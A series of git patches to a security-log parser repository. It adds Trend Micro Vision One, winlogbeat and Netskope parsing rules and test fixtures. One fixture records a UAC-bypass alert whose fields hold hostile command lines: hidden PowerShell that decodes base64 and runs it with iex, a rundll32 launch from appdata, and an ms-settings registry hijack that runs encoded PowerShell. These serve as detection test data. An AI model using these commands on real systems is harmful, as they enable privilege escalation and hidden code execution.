[], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-06T02:49:31Z", + "container": { + "id": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" + }, + "host": { + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "shockwave\\sam", + "name": "shockwave\\sam" + }, + "process": { + "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "parent": { + "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; " + } + }, + "registry": { + "data": { + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x" + }, + "hive": "hkcr", + "key": "ms-settings\\shell\\open\\command", + "path": "hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute", + "value": "delegateexecute" + }, + "related": { + "ip": [ + "10.10.58.51" + ] + }, + "rule": { + "name": "Privilege Escalation via UAC Bypass" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00022", + "case_id": "CL-1-20230706-00001", + "incident_id": "IC-1-20230706-00001", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "email": "support@pctutordetroit.com" + } + } +} \ No newline at end of file From f316fac6627ec461e64f6d3fa367286cf088a1ad Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 19 Nov 2024 09:52:34 +0200 Subject: [PATCH 36/84] Add smart descriptions --- .../trend-micro-vision-one/_meta/smart-descriptions.json | 6 ++++++ Trend Micro/trend-micro-vision-one/ingest/parser.yml | 2 ++ Trend Micro/trend-micro-vision-one/tests/test_process.json | 1 + Trend Micro/trend-micro-vision-one/tests/test_registry.json | 1 + 4 files changed, 10 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json index e69de29bb..7a3ee9d51 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json +++ b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json @@ -0,0 +1,6 @@ +[ + { + "value": "{event.reason}", + "conditions": [{ "field": "event.reason" }] + } +] diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 38a31dd29..be400399d 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -20,6 +20,8 @@ stages: observer.vendor: "TrendMicro" observer.product: "Vision One" + event.reason: "{{parsed_event.message.model}}" + - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 5eca6b2ea..d6ef4acd1 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -9,6 +9,7 @@ "intrusion_detection" ], "kind": "alert", + "reason": "Credential Dumping via Mimikatz", "type": [ "info" ] diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 093876a30..f9873edf1 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -9,6 +9,7 @@ "intrusion_detection" ], "kind": "alert", + "reason": "Privilege Escalation via UAC Bypass", "type": [ "info" ] From 4b2aab06f6f6c739acc1bc9f1557ccc496ed6edc Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 19 Nov 2024 09:54:57 +0200 Subject: [PATCH 37/84] Add automation UUIDs --- Trend Micro/trend-micro-vision-one/_meta/manifest.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml index c0121a28d..8363b7b96 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml @@ -1,4 +1,6 @@ uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 +automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 name: Trend Micro Vision One slug: trend-micro-vision-one From fbbe4c415d5ff8c2fd61103b32f54b68711e66a7 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 09:44:23 +0100 Subject: [PATCH 38/84] small fixes on conditions --- .../winlogbeat/_meta/smart-descriptions.json | 108 +++++++++++++++++- 1 file changed, 105 insertions(+), 3 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index b720b4ffb..d3979925e 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -205,6 +205,35 @@ } ] }, + { + "value": "{action.properties.SubjectDomainName}\\{action.properties.SubjectUserName} logged on to {host.name} with special privileges", + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 4672 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SubjectDomainName" + }, + { + "field": "action.properties.SubjectuserName" + }, + { + "field": "host.name" + } + ] + }, { "value": "{user.domain}\\{user.name} logged on to {host.name} with special privileges", "relationships": [ @@ -222,6 +251,15 @@ { "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" } ] }, @@ -726,7 +764,7 @@ "value": "Microsoft-Windows-Security-Auditing" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, @@ -802,7 +840,7 @@ "value": "Microsoft-Windows-Security-Auditing" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, @@ -853,7 +891,7 @@ "field": "source.ip" }, { - "field":"host.hostname" + "field": "host.hostname" } ] }, @@ -1068,6 +1106,58 @@ } ] }, + { + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.SourcePort" + } + ] + }, + { + "value": "{host.hostname} allowed a connection to {action.properties.DestAdress}:{action.properties.DestPort}", + "relationships": [ + { + "source": "action.properties.SourceAddress", + "target": "action.properties.DestAddress", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 5156 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.DestPort" + } + ] + }, { "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", "relationships": [ @@ -1085,6 +1175,18 @@ { "field": "winlog.provider_name", "value": "Microsoft-Windows-Security-Auditing" + }, + { + "field": "action.properties.SourceAddress" + }, + { + "field": "action.properties.DestAddress" + }, + { + "field": "action.properties.SourcePort" + }, + { + "field": "action.properties.DestPort" } ] }, From 2207f3078290450fbbbcfe9b4584bf68d7a3fb49 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 09:47:15 +0100 Subject: [PATCH 39/84] fixing typo --- Beats/winlogbeat/_meta/smart-descriptions.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Beats/winlogbeat/_meta/smart-descriptions.json b/Beats/winlogbeat/_meta/smart-descriptions.json index d3979925e..1d8547db9 100644 --- a/Beats/winlogbeat/_meta/smart-descriptions.json +++ b/Beats/winlogbeat/_meta/smart-descriptions.json @@ -1133,7 +1133,7 @@ ] }, { - "value": "{host.hostname} allowed a connection to {action.properties.DestAdress}:{action.properties.DestPort}", + "value": "{host.hostname} allowed a connection to {action.properties.DestAddress}:{action.properties.DestPort}", "relationships": [ { "source": "action.properties.SourceAddress", @@ -1159,7 +1159,7 @@ ] }, { - "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAdress}:{action.properties.DestPort}", + "value": "{host.hostname} allowed a connection from {action.properties.SourceAddress}:{action.properties.SourcePort} to {action.properties.DestAddress}:{action.properties.DestPort}", "relationships": [ { "source": "action.properties.SourceAddress", From 6abd31bb9209f77aab598e290a7c8370a98a67ff Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 10:55:07 +0100 Subject: [PATCH 40/84] Fixes on Netskope format --- Netskope/netskope_events/ingest/parser.yml | 5 +- .../test_audit_log_deleted_inline_policy.json | 1 + .../test_audit_log_edit_admin_record.json | 1 + .../tests/test_audit_log_login_failed.json | 1 + .../test_audit_log_login_successful.json | 1 + .../test_audit_log_logout_successful.json | 1 + ..._audit_log_password_change_successful.json | 1 + .../tests/test_connection_log.json | 1 + .../tests/test_dlp_incident.json | 3 +- .../tests/test_malware_alert.json | 5 +- .../tests/test_nspolicy_block.json | 109 ++++++++++++++++ .../tests/test_nspolicy_log.json | 3 +- .../tests/test_nspolicy_upload.json | 120 ++++++++++++++++++ .../tests/test_user_alert.json | 2 +- 14 files changed, 248 insertions(+), 6 deletions(-) create mode 100644 Netskope/netskope_events/tests/test_nspolicy_block.json create mode 100644 Netskope/netskope_events/tests/test_nspolicy_upload.json diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml index 1c33c07bc..7ce3a2543 100644 --- a/Netskope/netskope_events/ingest/parser.yml +++ b/Netskope/netskope_events/ingest/parser.yml @@ -36,7 +36,7 @@ stages: "@timestamp": "{{parse_date.datetime}}" observer.vendor: "Netskope" event.dataset: "{{parsed_event.message.type}}" - event.action: "{{parsed_event.message.activity}}" + event.action: "{{parsed_event.message.action or parsed_event.message.activity or 'Allow'}}" event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}" event.duration: "{{parsed_event.message.conn_duration}}" user_agent.original: "{{parsed_event.message.user_agent}}" @@ -92,6 +92,9 @@ stages: - set: file.path: "{{parsed_event.message.file_path}}" filter: '{{parsed_event.message.file_path not in [None, "", "NA"]}}' + - set: + file.size: "{{parsed_event.message.file_size}}" + filter: "{{parsed_event.message.file_size not in [None, 0]}}" - translate: dictionary: "yes": "alert" diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json index 67944d71d..df70ea26e 100644 --- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json +++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651451341,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Deleted inline policy\",\n \"supporting_data\": {\n \"data_type\": \"policy\",\n \"data_values\": [\n false\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"acfa7348-64c5-40de-b28d-202c8362d0f7\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "configuration" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json index 79f08033a..10b406a5f 100644 --- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json +++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Edit admin record\",\n \"supporting_data\": {\n \"data_type\": \"admin\",\n \"data_values\": [\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"275a263c8f8d4b7d9e12bf65b9094116\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "configuration" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json index 8a05a5c15..8a792a408 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651494031,\n \"type\": \"admin_audit_logs\",\n \"user\": \"student13\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Login Failed\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"4.5.6.7\",\n \"student13\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"student13\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"60d81a80b26149b8a910dfffc48cbf41\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json index 1b4d67977..01549d366 100644 --- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1671727087,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Login Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"john.doe@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"45b78fd638944e9ca0c6d92dfe2d4815\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json index 8b4635920..12e39be95 100644 --- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1670409967,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 2,\n \"audit_log_event\": \"Logout Successful\",\n \"supporting_data\": {\n \"data_type\": \"reason\",\n \"data_values\": [\n \"Logged out due to inactivity\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"e0272abae25442f681d0dbbef65b67e9\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "authentication" ], diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json index b06db05ac..a2fa885de 100644 --- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json +++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json @@ -5,6 +5,7 @@ "expected": { "message": "{\n \"timestamp\": 1651489787,\n \"type\": \"admin_audit_logs\",\n \"user\": \"john.doe@example.org\",\n \"severity_level\": 1,\n \"audit_log_event\": \"Password Change Successful\",\n \"supporting_data\": {\n \"data_type\": \"user\",\n \"data_values\": [\n \"1.2.3.4\",\n \"admin@example.org\"\n ]\n },\n \"organization_unit\": \"\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"ccl\": \"unknown\",\n \"count\": 1,\n \"_id\": \"47e7e59a6ffa4662be63836a0f898b16\",\n \"userPrincipalName\": \"\",\n \"sAMAccountName\": \"\"\n}\n", "event": { + "action": "Allow", "category": [ "iam" ], diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json 